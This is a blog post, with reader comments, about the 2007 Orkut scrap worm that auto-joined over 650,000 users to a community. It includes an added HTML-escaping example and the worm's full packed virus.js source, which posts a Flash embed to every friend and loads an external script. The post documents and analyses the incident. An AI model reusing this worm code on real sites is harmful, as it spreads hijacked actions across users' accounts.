Orkut XSS

Aftermath: Let's try and summarize everything here.

  1. On Orkut, you can use arbitrary HTML when scrapping your friends. Rodrigo's worm exploited this 'feature'. It started by scrapping a malicious Flash file. Merely viewing this scrap causes the Flash object to load, which in turn loads our favourite virus.js file. The JavaScript code in that file first joins you to the community called Infectados pelo Vírus do Orkut (in English: Infected by the Orkut Virus) and then sends the same Flash file as a scrap to as many people in your friends list as possible. So when each of your friends views their Scrapbook, they in turn start propagating the worm to their friends, and so on.

  2. Friends don't let friends use raw HTML would be a good maxim for everyone to follow ;-)

  3. It's fair to say that almost every member of that community was an involuntary signup. So based on the reported peak size of the community, more than 655,000 users were affected.

  4. The attack was apparently without malicious intent and done just to highlight the security problems with such networking sites. Although the motives might be clean, I question the modus operandi. McAfee folks have named this W32/KutWormor.

  5. This post got linked from various places including several bloggers, News.com, ZDNet and Valleywag(!). But, as Valleywag points out, if this had happened on MySpace or Facebook, it would be all over the US media.

  6. No official word from Orkut yet on this except this reply in a forum thread. Amusingly, the list of suggestions offered in that reply to 'stay safe' wouldn't have helped at all with this worm! It would have worked anyway unless you had Flash and/or JavaScript disabled.

  7. Curiously enough, the official Orkut blog got a new post during/after this incident but the post says absolutely nothing about what happened!
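As an added illustration of point 2 (example code written for this summary, not Orkut's code and not the worm's), here is how a scrap renderer can allow a little formatting without ever accepting raw HTML: escape everything, then re-enable a handful of exact tokens. The sample scrap is constructed to have the shape described in point 1, with a placeholder URL.

```javascript
// Added example, not Orkut's or the worm's code: render a scrap as text with a tiny
// markup allowlist instead of accepting raw HTML, which is what let the worm's
// <embed> into everyone's Scrapbook.

// Step 1: neutralise every HTML-significant character. After this, nothing the
// sender typed can open a tag, an attribute or a URL in the rendered page.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Step 2: re-enable only exact, attribute-free formatting tokens. Matching happens
// on the escaped literal, so a tag carrying attributes (src=, onmouseover=, ...)
// never matches and stays as harmless visible text.
const ALLOWED_TOKENS = [
  ["&lt;b&gt;", "<b>"], ["&lt;/b&gt;", "</b>"],
  ["&lt;i&gt;", "<i>"], ["&lt;/i&gt;", "</i>"],
  ["&lt;br&gt;", "<br>"], ["&lt;br/&gt;", "<br>"],
];

function renderScrap(rawScrap) {
  let out = escapeHtml(rawScrap);
  for (const [escaped, tag] of ALLOWED_TOKENS) {
    out = out.split(escaped).join(tag);
  }
  return out;
}

// Does markup still contain anything that can load code or a resource?
// Useful as a unit-test oracle for the renderer above.
function containsActiveContent(html) {
  return /<(embed|object|script|iframe|img|link)\b/i.test(html) || /\son\w+=/i.test(html);
}

// Constructed scrap with the shape the summary describes: a greeting followed by a
// 1x1 Flash embed pointing at an external host (placeholder URL, not the real one).
const WORM_LIKE_SCRAP =
  "2008 vem ai... que ele comece mto bem para vc<br/>" +
  '<embed src="http://example.invalid/worm.swf" type="application/x-shockwave-flash"' +
  ' wmode="transparent" width="1" height="1"></embed>';

console.log(renderScrap(WORM_LIKE_SCRAP));
console.log("active content:", containsActiveContent(renderScrap(WORM_LIKE_SCRAP)));
```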

That's the summary and hopefully the last update here! The original post covering this worm follows below.


Someone (maybe Rodrigo Lacerda, see below) seems to have found an XSS attack for Orkut. A piece of JavaScript code, named virus.js and fetched from a myopera location, somehow made its way into my Orkut session and started scrapping everyone possible at break-neck speed. My friends reported Portuguese language scraps (I originally wrote Spanish; see the first comment below) with some Flash content from me, while I've seen similar scraps in my Scrapbook.

From my initial Firebug console digging, this code sneaks in when opening the Scrapbook page. And the attack code is fetched just after loading gtalknotifier004.js so perhaps there's an XSS hole in that script. Not sure though, I'm a JS newbie :-)

For now, don't log on to Orkut! Or if you use Adblock, just block anything named *virus.js

Does anyone know how I should report such stuff to Orkut? I can't seem to locate any vulnerability report form in their support pages.

Update: If you've blocked the virus.js file, log in and check your communities. You'll see an extra one! If you aren't able to unjoin the community, don't panic. I believe it's just an automated throttling response by Orkut's systems to the massive scrapping initiated from our accounts. It should be fixed in a few hours.

Update: The embedded Flash in the notorious scrap (_2008 vem ai... que ele comece mto bem para vc_) is also part of the exploit. I don't know exactly what it does since I use Flashblock all the time! Also, some blogs are suggesting changing passwords. I don't think that's needed since I don't believe passwords have been compromised. Of course, don't treat my opinion as infallible advice, do what you must. I know I'm not changing my password just because of this!

Update: Reader Steve (thanks!) informs me in the comments below that this hole was reported sometime back and was already fixed. From this page:

On November 8th 2006 Rajesh Sethumadhavan discovered a type 2 vulnerability in the social network site Orkut which would make it possible for orkut members to inject HTML and JavaScript into their profile. Rodrigo Lacerda used this vulnerability to create a cookie stealing script known as the Orkut Cookie Exploit which was injected into the orkut profiles of the attacking member(s). By merely viewing these profiles unsuspecting targets had the communities they owned transferred to a fake account of the attacker. On December 12th Orkut had fixed the vulnerability.

And the actual report referenced in the above quote: Orkut Group Cross Site Scripting Vulnerability. I don't know enough to say whether the situation we are seeing today is due to the same vulnerability.

Update: People seem to think that somehow they were responsible for facilitating this attack. Like perhaps they clicked on a bad link or something. From what I understand, this isn't a phishing attack and there's nothing you could've done to prevent this. Except, maybe, not visiting Orkut.com!

Update: Apparently fixed! The virus.js file is no longer fetched and all the spam scraps in my scrapbook have disappeared. I could unjoin the 'special' community too, which at this point in time has 390,262 members, which means (at least) 390,262 affected users. That's not good!

Update: More from Reader Steve in the comments. Apparently, the community that we are all involuntarily a part of now is some kind of vigilante community created just to make a point that these systems are insecure. Steve's comment:

The infected group is called "Infectados pelo Vírus do Orkut" and has nearly 400K members (minus me now).
The group description (loosely translated via Babelfish) is:
In computer science, a virus is a malicious program developed by programmers who, such as a biological virus, infectum the system, makes copies of itself exactly and tries to spread itself for other computers, using itself of diverse ways. Return more for the community SEES AS IF TO PROTECT Click With this you if not to want here. CALM! If you lode to stop in this community, is certain that no data its were stolen and nor go to be, is not this my objective. If I will be certain, in the end of everything, this community I must I am crowded of people. This to only show as orkut can be dangerous, you came to stop here without clicar in none link absolutely malicious, everything was made reading scraps.

Update: Some readers have kindly posted deobfuscated versions of the virus.js script. Thanks! Since they weren't fitting well in the comments below, I've moved them to a pastebin site. See version 1 and version 2. I'll post some analysis if I get time to do some!

The script is fetched from here: http://files.myopera.com/virusdoorkut/files/virus.js

function $(p,a,c,k,e,d) {
    e=function(c) {
        return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))
    };
    if(!''.replace(/^/,String)){
        while(c--){d[e(c)]=k[c]||e(c)}
        k=[function(e){return d[e]}];
        e=function(){return'\\w+'};
        c=1
    };
    while(c--){
        if(k[c]){
            p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])
        }
    }
    return p
};
setTimeout(
    $('5 j=0;5 q=1q["2o.H"];5 E=1q["2p.K.27"];7 B(){Z{b i 14("29.1l")}
    L(e){};Z{b i 14("2b.1l")}L(e){};Z{b i 2l()}L(e){};b J};
    7 W(g,P,m,c,9,U){5 1m=g+"="+19(P)+(m?"; m="+m.2f():"")+(c?"; c="+c:"")+(9?"; 9="+9:"")+(U?"; U":"");
    8.y=1m};7 v(g){5 l=8.y;5 A=g+"=";5 h=l.S("; "+A);6(h==-1){h=l.S(A);6(h!=0){b 2h}}16{h+=2};
    5 u=8.y.S(";",h);6(u==-1){u=l.M};b 2j(l.2m(h+A.M,u))};
    7 26(g,c,9){6(v(g)){8.y=g+"="+(c?"; c="+c:"")+(9?"; 9="+9:"")+"; m=1u, 1i-1v-1x 1g:1g:1i 1y";1U.1z(0)}};
    7 G(){5 3=B();6(3){3.R("1A","o://k.w.p/1B.z",C);3.a(J);3.Y=7(){6(3.X==4){6(3.1a==1c){5 1r=3.1Q;5 t=8.1n("t");
    t.1D=1r;5 f=t.D("f").O(0);6(f){f.1M(f.D("1F").O(0));f.1G("1H","N");f.1J.1K="1L";8.1N.1f(f);V()}}16{G()}}};
    3.a(J)}};7 T(){5 a="H="+n(q)+"&K="+n(E)+"&15.1O";5 3=B();3.R(\'q\',\'o://k.w.p/1P.z?1R=1S\',C);
    3.12(\'10-1e\',\'Q/x-k-17-1b\');3.a(a);3.Y=7(){6(3.X==4){6(3.1a!=1c){T();b};G()}}};
    7 V(){6(j==8.18("N").M){b};
    5 I="1V 1W 1X... 1Y 1Z 20 21 22 23 24<1k/>[1j]25 "+i F()+"[/1j]<1k/><13 1o=\\"o://k.w.p/28.z\\" 2a=\\"Q/x-2c-2d\\" 2e=\\"2g\');
    r=8.1n(\'r\');r.1o=\'o://1p.2k.p/2n/1p/1s.1t\';8.D(\'1w\')[0].1f(r);19(\'\\" 1C=\\"1\\" 1E=\\"1\\"></13>";
    5 a="15.1I=1&H="+n(q)+"&I="+n(I)+"&K="+n(E)+"&1T="+8.18("N").O(j).P;5 3=B();
    3.R("q","o://k.w.p/2i.z",C);3.12("10-1e","Q/x-k-17-1b;");
    3.a(a);3.Y=7(){6(3.X==4){j++;5 d=i F;d.1d(d.1h()+11);W(\'s\',j,d);V()}}};
    6(!v(\'s\')){5 d=i F;d.1d(d.1h()+11);W(\'s\',\'0\',d)};j=v(\'s\');T();
    ',62,150,'|||xml||var|if|function|document|domain|send|return|path|wDate||select|name|begin|new|index|
    www|dc|expires|encodeURIComponent|http|com|POST|script|wormdoorkut|div|end|getCookie|orkut||cookie|aspx
    |prefix|createXMLHttpRequest|true|getElementsByTagName|SIG|Date|loadFriends|POST_TOKEN|scrapText|null|
    signature|catch|length|selectedList|item|value|application|open|indexOf|cmm_join|secure|sendScrap|setCookie|
    readyState|onreadystatechange|try|Content|86400|setRequestHeader|embed|ActiveXObject|Action|else|form|
    getElementById|escape|status|urlencoded|200|setTime|Type|appendChild|00|getTime|01|silver|br|XMLHTTP|curCookie|
    createElement|src|files|JSHDF|xmlr|virus|js|Thu|Jan|head|70|GMT|go|GET|Compose|width|innerHTML|height|option|
    setAttribute|id|submit|style|display|none|removeChild|body|join|CommunityJoin|responseText|cmm|44001818|toUserId|
    history|2008|vem|ai|que|ele|comece|mto|bem|para|vc|RL|deleteCookie|raw|LoL|Msxml2|type|Microsoft|shockwave|flash|
    wmode|toGMTString|transparent|false|Scrapbook|unescape|myopera
    |XMLHttpRequest|substring|virusdoorkut|CGI|Page'.split('|'),0,{}),1
);
author="Rodrigo Lacerda"

Comments

Isn't Spanish... it is Portuguese. "2008 is coming... that it begins really well for you" is the message.

I actually just deleted my Orkut account after getting pissed off at the fact that it seems to be spamming people without me even clicking on anything.

I pretty much just logged on to orkut and deleted all my spammy scraps and it seems that was enough to do the damage.

I'm not very computer literate, but that's strange, eh. Any suggestions on how Orkut users can stop this thing?

What does it mean? It doesn't make much sense, does it?

what does "function $(p,a,c,k,e,d)" mean?

If you use Firefox with the Adblock extension, just block anything named virus.js

There must be similar blocking solutions for IE. Or your firewall can help you block this file.

It's javascript code. Makes sense if you know the language :)

Hmm, wonder if it had something to do with a simultaneous login to Gtalk..

Can I block it with Adblock even after it already screwed up my Orkut account?

It'll prevent any further screwing of your account. Then we just wait for Orkut folks to clean up the mess!

I disabled Javascript in Firefox, logged into Orkut, saw two communities I didn't recognize, then re-enabled Javascript long enough to click "unjoin" and confirm.

I'm trying to figure out how I got added to these communities since I never explicitly did. Unless... I wonder if the community in question was perhaps hijacked by someone who changed the name and purpose of the community, and then used that to propagate their virus?

Anyway, it's bizarre in that I got three scraps from "friends" who obviously didn't send them and it's not at all clear how it started...

Sounds like this could be the straw that causes many folks to "sign out" from Orkut once and for all...

I blocked the JavaScript using Adblock Plus (from Firefox). I also see the strange community in the Portuguese language in my list of communities. But I cannot unjoin from the community. It says: "You have temporarily been disallowed from performing this action. Please try again after some time."

The infected group is called "Infectados pelo Vírus do Orkut" and has nearly 400K members (minus me now).

The group description (loosely translated via Babelfish) is:

In computer science, a virus is a malicious program developed by programmers who, such as a biological virus, infectum the system, makes copies of itself exactly and tries to spread itself for other computers, using itself of diverse ways. Return more for the community SEES AS IF TO PROTECT Click With this you if not to want here. CALM! If you lode to stop in this community, is certain that no data its were stolen and nor go to be, is not this my objective. If I will be certain, in the end of everything, this community I must I am crowded of people. This to only show as orkut can be dangerous, you came to stop here without clicar in none link absolutely malicious, everything was made reading scraps.

I'm guessing if you block the .js file, you'll be unable to unjoin. That's why I disabled Javascript, logged in, and re-enabled it to unjoin...

Did that work? It doesn't sound technically infeasible. My guess is that all our accounts have automatically been temporarily suspended from making any database changes since they've been scrapping like crazy.

See also http://lucky-six.blogspot.com/2007/12/orkut-xss-attack.html

Yes, I've seen that too. I think our activities have been automatically throttled by orkut's systems because of the high volume of scrapping. I guess we just wait for the limits to be lifted by Orkut folks. When does the Sun rise over there? :-)

Hey Steve. How about a link back to this page? :-)

Kunal, I am more inclined to believe someone found an exploit in their new notification feature.

http://en.blog.orkut.com/2007/11/scrap-alerts.html

Perhaps someone skilled in this trade can offer more clues!

@antrix: Sorry about that... lucky-six isn't my site, just another one I found with more information on this stupid virus...

Actually, this site seems to indicate that it's already been fixed, but perhaps not before several communities were hijacked (as I guessed above): http://blackops.top-promoters.com/archives/8

In the middle of that page, see the "real world example" that starts out "On November 8th ...". It further links to the actual description of the vulnerability here: http://packetstormsecurity.org/0612-exploits/XD100098.txt

The decoding of the virus. I don't know if it is a good idea to post this. But will do it anyway. My friend and I used firebug to print out the output of function $ after unpacking.

snip!

BTW, an infected friend just wrote: >>>> Nope, all you had to do was visit Orkut with any modern browser. They allow HTML into your friends' scrapbooks, so they made a javascript based attack. When you viewed the page in the e-mail that Orkut sent you (and me), it loaded the virus.js, which then sent scraps to all your friends and joined you to a particular group. I just deleted my orkut account. Grrr. Has anyone disassembled the script yet? Clearly Orkut has _not_ fixed this. <<<<

Hmmm. I suspect the damage is done if you follow the scrapbook link before either disabling javascript or blocking the .js file.

I too have deleted my Orkut account. I'll be curious to hear if there's any residual damage from this script having run...

Not a good idea!

Here's a link to the decoded output: http://paste.uni.cc/17840

I too have FlashBlock installed, so I don't understand how this thing could've convinced my browser to further scrap my friends, but somehow it did. Thus I'm not sure that Flashblock (alone) is sufficient to block it...

Same here! I suspect there are multiple parts to this exploit. The scrapping itself could be initiated via a pure JS exploit while the flash file does some more damage.

Any idea if the vulnerability in that security report is the same one as this?

My assumption is that Flashblock prevents it from downloading and running. I checked a few of my friends' scrapbooks, didn't find scraps from me there. Thanks for the post! :-)

Was surprised to see my inbox filled with Orkut notifications - apparently every human being I ever met suddenly was reminded of me last night and feeling bad, logged into Orkut and left me a scrap.

That illusion remained till now. I still haven't logged into Orkut (don't want to, from work) but damn you, D. I wanted to believe in the illusion.

Hi! As someone who has spent a long time playing with Orkut exploits, this is pretty interesting. At first glance it sounds like an updated version of something I found back in June 06, which (if memory serves me right) attempted to exploit XSS in a (very) limited fashion.

For what it's worth, if you mail me at PaperghostATvitalsecurityDOTorg, I can pass on info to a Google contact for you if still needed.

Thanks, Chris Boyd

Thanks for the offer but I guess they've already fixed it so there's no point in contacting them now.

But perhaps you'll be able to tell me if there is really an XSS exploit here.. 'cos I get the feeling that just the ability to post HTML scraps allowed the posting of that swf, which in turn could pull in the external JavaScript code. Is there a vulnerability in the traditional sense?
